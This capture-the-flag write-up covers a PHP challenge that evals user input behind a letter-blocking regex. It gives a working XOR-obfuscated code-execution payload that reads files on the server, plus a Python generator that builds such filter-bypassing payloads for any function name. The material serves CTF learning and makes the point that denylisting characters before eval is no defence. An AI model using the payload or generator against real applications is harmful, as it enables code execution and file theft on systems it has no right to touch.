Tags: web php webshell 

# Web Warm-up

![Challenge Description](WebWarmup.png)

We are given a link to <http://69.90.132.196:5003/?view-source>

It leads us to a webpage that shows the challenge's PHP source. From that source we get to know that the regular expression checks whether any alphabetic character is present in the supplied string (in this case the value of the `$_GET['warmup']` parameter).

Let's evaluate the preg_match expression in a PHP interpreter.

```bash
bash => php -a
Interactive mode enabled

php > echo preg_match('/[A-Za-z]/is', "abcd");
1
php > echo preg_match('/[A-Za-z]/is', "1234");
0
```

So if we want our input to be executed, it must not contain any alphabetic characters and must be less than 60 characters in length.

## Developing the exploit

[This](https://ctf-wiki.github.io/ctf-wiki/web/php/php/#preg_match-code-execution) link contains some information on preg_match check bypassing. The above reference explains a few things about PHP.

1. XORing strings in PHP

2. '_' variables

3. Calling functions through strings

Combining these concepts, we can construct strings by XORing other strings and then call PHP functions through the constructed strings.

The desired function call we would like to make is

```php
eval("readfile('flag.php');")
```

But the above won't work because we cannot construct the '.' character without using any alphabetic characters.

So we have to go for a different approach.

```php
eval("readfile(glob('*')[0])") // Assuming that the flag.php is the first file in the directory.
```

Since the function names 'readfile' and 'glob' are the parts containing alphabetic characters, let's construct them by XORing two strings which do not contain any.

```php
// ^ stands for XOR
$_="@:>;963:"^"2_______"; // readfile
$__="____"^"830="; // glob
$_($__('*')[0]); // readfile(glob('*')[0])
```
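The XOR pairs above were worked out by hand. The following Python script, added here as an example and not part of the original writeup, generalises the construction: it mirrors PHP's string `^` operator, searches for a letter-free operand pair for any function name, assembles the same `$_(...)`/`$__(...)` shape used above, and checks the result against a model of the challenge's filter (no `[A-Za-z]`, fewer than 60 characters, as described earlier). The `SAFE` alphabet and the function names are the script's own assumptions. The point for a defender is visible in `passes_filter`: a denylist of characters applied before `eval` rejects the literal name but accepts an equivalent payload, so the only real control is to never evaluate user-supplied input.

```python
import re

# Candidate bytes for the two XOR operands: printable ASCII with no letters
# (so /[A-Za-z]/ never matches) and none of " ' \ $, which would need escaping
# or would be interpolated inside a double-quoted PHP string. (Assumed alphabet.)
SAFE = [c for c in range(0x20, 0x7F)
        if not chr(c).isalpha() and chr(c) not in "\"'\\$"]


def php_xor(a: str, b: str) -> str:
    """Mirror PHP's string ^ operator: byte-wise XOR, truncated to the shorter string."""
    return "".join(chr(x ^ y) for x, y in zip(a.encode("ascii"), b.encode("ascii")))


def xor_pair(target: str) -> tuple[str, str]:
    """Return two letter-free strings whose byte-wise XOR equals `target`."""
    left, right = [], []
    for ch in target:
        for a in SAFE:
            b = a ^ ord(ch)
            if b in SAFE:
                left.append(chr(a))
                right.append(chr(b))
                break
        else:
            raise ValueError(f"no letter-free XOR pair for {ch!r}")
    return "".join(left), "".join(right)


def build_payload(func: str, arg_func: str) -> str:
    """Assemble the writeup's $_($__('*')[0]) shape for arbitrary function names."""
    a, b = xor_pair(func)
    c, d = xor_pair(arg_func)
    return f'$_="{a}"^"{b}";$__="{c}"^"{d}";$_($__(\'*\')[0]);'


def passes_filter(payload: str) -> bool:
    """Same accept/reject decision as the challenge: no [A-Za-z] and under 60 chars."""
    return re.search(r"[A-Za-z]", payload) is None and len(payload) < 60


if __name__ == "__main__":
    # The pairs used in the writeup decode to the intended names.
    print(php_xor("@:>;963:", "2_______"), php_xor("____", "830="))
    payload = build_payload("readfile", "glob")
    print(payload, len(payload), passes_filter(payload))
    # The plain call is rejected, the XOR-built equivalent is accepted.
    print(passes_filter("readfile(glob('*')[0]);"))
```

Because `'_' ^ x` maps every lowercase letter to a digit or punctuation byte, the search always finds a pair for lowercase names; the generated payload has the same length as the hand-built one (59 characters), which is why it fits under the 60-character limit.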

The final exploit is

```php
$_="@:>;963:"^"2_______";$__="____"^"830=";$_($__('*')[0]);
```

URL-encoding this payload and sending it as the `warmup` parameter in the request to the website gives us the flag.

![Flag](flag.png)

## References

1. <https://ctf-wiki.github.io/ctf-wiki/web/php/php/#preg_match-code-execution>

Original writeup (https://github.com/networknerd/CTF_Writeups/blob/master/2020/ASISCTF_2020/Web/WebWarmup/README.md).